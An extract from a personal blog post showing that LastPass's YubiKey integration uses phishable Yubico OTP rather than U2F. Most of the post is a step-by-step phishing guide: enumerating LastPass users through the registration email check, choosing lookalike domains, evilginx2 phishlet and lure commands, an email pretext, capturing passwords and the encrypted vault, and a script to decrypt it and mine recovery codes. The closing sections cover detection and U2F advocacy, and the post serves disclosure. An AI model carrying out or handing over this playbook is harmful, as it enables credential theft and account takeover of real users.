This is a medium-sized extract from a longer blog post of mine. I go a little more in-depth on the difference between U2F and OTP and how LastPass decrypts your vault, you can see the full blog post.
(Un)fortunately, this is NOT a MITM attack on U2F. LastPass doesn’t support U2F so this is disappointingly simple. It uses Yubico OTP, which we know to be phishable.
In this article, I show mainly how to deploy a phishing attack on LastPass users, even when they are protected with Yubikey physical keys. This is to remind people that YubiKey is not necessarily U2F.
Use security keys to prevent phishing
In recent years, phishing has proven to be one of the most effective ways of hacking people. Instead of using a fancy new exploit to steal a victim’s credentials, the hacker just asks the victims to hand their credentials over.
How do we combat this? One answer is “use security keys!”
“We have had no reported or confirmed account takeovers since implementing security keys at Google” 
In a phishing attack, the weak point is the human user. By using security keys and protocols such as U2F, you relieve some of the burdens of distinguishing fake and real sites from the user.
Below we see LastPass endorsing the use of YubiKeys. In the diagram, we see that YubiKey is more secure, easy to use, and not phishable.
With that said, I recently got myself some Yubikeys. To use this “Advanced Multi-factor Option” with Lastpass, I needed a premium account. Being a long time user of Lastpass, I didn’t think twice and paid to upgrade to premium.
Within minutes, I felt shortchanged. It quickly became obvious that using a Yubikey did not make my LastPass vault any more secure against phishing.
Why? Lastpass’s integration with the YubiKey uses Yubico OTP and not U2F.
Is this important and is U2F really THAT more secure?
Let me show you why this is important.
How to deploy phishing campaign
Let’s take a red team mindset to appreciate why phishing is so effective and how easy it is for us to fall for it. We use a reverse proxy to do a “man-in-the-middle” (MITM) attack to steal the credentials and bypass 2 Factor Authentication (2FA).
Here’s an overview of how a MITM attack works.
Of course, phishing using MITM applies to many other sites. What makes LastPass unique is that it is the only site that I personally use that is still vulnerable to MITM even when using a Yubikey.
Let’s say you have to target an individual or a company. You first try to get a small collection of email addresses from searching through LinkedIn, Github, Twitter, blogs, and other OSINT sources.
Now with these target emails, you explore the options available for your attack. The LastPass vault is a gold mine of credentials since one phishing attack can result in many credentials. Let’s see if these emails are possible LastPass users.
Since the registration processes would check the availability of an email address, we can use it to gather more intel. If the email address is taken, then it is likely that the owner uses LastPass.
If you want to enumerate a small list of potential targets, then you can use this simple API which returns ok/no.
For targeted attacks, this is an effective way to check whether or not you can be phished on LastPass. Broader random attacks would be unlikely if the availability endpoint is rate limited.
Getting the right domain
Having a legitimate-looking domain might make it easier to trick the victim. There are a lot of ways that we can gain a legitimate-looking domain. Maybe slight modifications of the spelling or explore other TLDs. We chose
Here are other examples of possible phishing domains for LastPass.
These are domains that are affordable for a red team and individual hackers.
I hope you realize that in cases such as this one, a domain like
lastpass.com.es is as suspicious as
Setting up the servers
To set up our phishing site I’ve prepared a fork of evilginx2 , which has some additional logic to steal the credentials from LastPass.
This is a golang application, so you would need to install golang and run the following commands:
It is surprising how mature the phishing tools are. The development of this only took around just a day. It is easy to set up phishing sites for your bank, or company website, complete with domain and SSL.
You can set this up on your favorite cloud hosting provider. After setting up the binaries of evilginx2. You run it and then configure the LastPass phishlet.
# sudo ./bin/evilginx -p ./phishlets/ -developer> config ip 127.0.0.1
> config domain lastpass.com.es> phishlets hostname lastpass lastpass.com.es
> phishlets enable lastpass
And then you create the link you want to bait them. The
redirect_url is the page you want the victim to end up once you get all the necessary credentials.
> lures create lastpass
> lures edit redirect_url 0 https://www.youtube.com/watch?v=dQw4w9WgXcQ
> lures get-url 0
In our case, we want our victim to go
Note: These instructions are meant to test this locally. For this to work locally you might need to add the following to
Sending the Phishing Email
Assuming that you use an existing phishlet, then we have to make a phishing email. This is really where a lot of the work comes in. You have to somehow trick the user into clicking. Crafting a good phishing email is an art.
In this case, we say that we have revoked trusted devices so that hopefully, he won’t be surprised just in case he gets alerts of new log-ins.
Waiting for the credentials
When the victim clicks on the link, he will be redirected to the fake LastPass login.
And when LastPass requires 2FA, then the fake website will ask the victim to provide the second factor.
As previous work  has mentioned, the victim will likely have to verify with their email because the logon activity is new. However, this might look less suspicious if we have already primed the victims to expect this by saying we’ve “revoked trusted devices”.
Once the session is trusted, the victim’s browser will start to download the encrypted vault. We steal this using the proxy along with the username and password of the victim.
Afterward, the victim will be redirected a some chosen site. In this case, the victim will be redirected to your chosen page.
Meanwhile, we have all that we need to get all the victim’s credentials.
Decrypting the vault
To decrypt the LastPass Vault, you would need 3 main ingredients:
- LastPass Username
- LastPass Password
- Encrypted Vault
With a MITM, we can steal the victim’s username and password, and once the session is trusted after OTP from the YubiKey, we can download the encrypted vault.
The original intention of the evilginx2 is to hijack the session. But I’ve found that it is easier to just dump the credentials in the vault. In theory, the proxy can get all necessary information to take takeover of the account.
In the project, I’ve provided a script
scripts/lastpass-python/dump_lastpass.py This parses the evilginx2 DB and decrypts the credentials. The location of the DB depends on where the config file is. In my case it was
This creates two files, one for credentials of the LastPass accounts, and the other is the credentials found in the vaults. You have everything in the vault, name, folder, username, password, URL, and secure notes associated with the item.
You can easily leverage this to try to take control of as much of the accounts that you can. To maximize your impact, you can write a script to automatically check if there are recovery codes in the notes. With the passwords and the recovery codes, you will have full control of their accounts.
Quick Notes on Phishing
Again, this problem is not specific to LastPass. You can be phished on almost any site you use. Some of them would have fewer protections than LastPass. However, among the main password managers, I think LastPass is the only one who still doesn’t support U2F.
How do we detect a phishing email?
It is trivial for an attacker to copy the design of an email. In our example, you might be able to detect it using the source domain. Although sometimes even the domain can be spoofed if not configured properly.
Aside from the domain, the actual content is the only “fishy” thing.
As for the phishing website itself. Gone are the days where phishing websites do not have SSL certificates . The only thing that would give it away is the domain. Because of our MITM proxy, what the victim sees is the exact clone of the actual site. There would be no visual differences and it is practically undetectable in the short term.
What are some ways you can protect yourself at this point?
If you use your password manager’s browser extension, it will not give you the password because it doesn’t recognize the domain.
The password manager looks solely at the domain of the site and doesn’t care whether or not it looks like FB, Twitter, Github, or Google. For example,
github.com not the same as
giithub.com. So if you are at
giithub.com the password manager won’t give any credentials to give you.
The special case for this would be your password manager yourself! It is one of the only sites that I manually input my password. So it is still a prime target for phishing.
How can this happen?
“I thought if we use security keys we can prevent phishing?”
That is only true if we are using U2F or some sort of challenge-response protocol. Unfortunately, as we’ve previously mentioned, LastPass’s integration with Yubikey is using the Yubico OTP.
The difference between Yubico OTP and U2F is subtle. The experience of each one is deceivingly similar.
You are given a prompt, you insert your Yubikey, and you press the button. Now you’re in!
YubiKey ≠ U2F
Why did I think that LastPass uses U2F? I think it boils down to naively associating YubiKey to security keys. But as I have learned, just because I’m using a YubiKey, doesn’t mean it’s U2F.
It doesn’t help that there were pages like this.
The diagram suggests that using Yubikeys with Lastpass makes you less “phishable” and more secure, which is only true when using U2F.
If we update the page to be more accurate we should have something like.
Distinguishing between U2F and Yubico OTP makes it clear that the OTP is phishable. This is something we just demonstrated.
Here is another page  which misled me:
Technically, this is true when using U2F. But considering that LastPass doesn’t support security keys, I think that statement is misplaced.
In the article below, it didn’t mention explicitly that LastPass supports U2F, but the association is.
It’s was surprising to find out that LastPass didn’t support U2F.
“If there’s one area where you’d expect U2F technology to be encouraged, it’s among password managers.” 
But in the end, it was just really stupid of me to pay for a premium account without double-checking what exactly I am paying for. Also, there are no refunds.
For those more experienced, this may have all been really obvious to you, but for the others, I hope you can learn from my experience. Simply looking at a table like this is misleading.
The “Hardware Token” can refer to both OTP and U2F. You have to took specifically whether or not it is U2F (or protocols).
Moving out of LastPass
Less than 24 hours of paying for a LastPass premium account, I’m moving out.
Given the current lack of U2F support, the lack of concrete plans to support U2F, and the sketchy plaintext URLs , I’m done with LastPass. I don’t know why I have stayed with it for so long.
Now that I really think about it, my ideal password manager should have the following properties:
- supports U2F for multifactor authentication to prevent phishing
- open-sourced and 3rd-part audited 
- Is self-hosted on my own servers
I’m currently looking into Bitwarden. Maybe self-hosted. If you have suggestions or comments on what password manager to use, I’d appreciate it.
If you want more details on the differences between U2F and OTP and how LastPass decrypts your vault, you check out the full blog post.
U2F and Security Keys
How LastPass decrypts your vault
 Krebs on Security, “Google: Security Keys Neutralized Employee Phishing (2018)”
 Lastpass Help, Use YubiKey Multifactor Authentication
 Kerbs on Security, Phishers Are Upping Their Game. So Should You.
 John Leyden, PortSwigger The Daily Swig, U2F nowhere near ready for prime time
 Josie Colt, Wired, Simplify and Secure Your Online Logins With a YubiKey
 ZDNet, Best security keys in 2020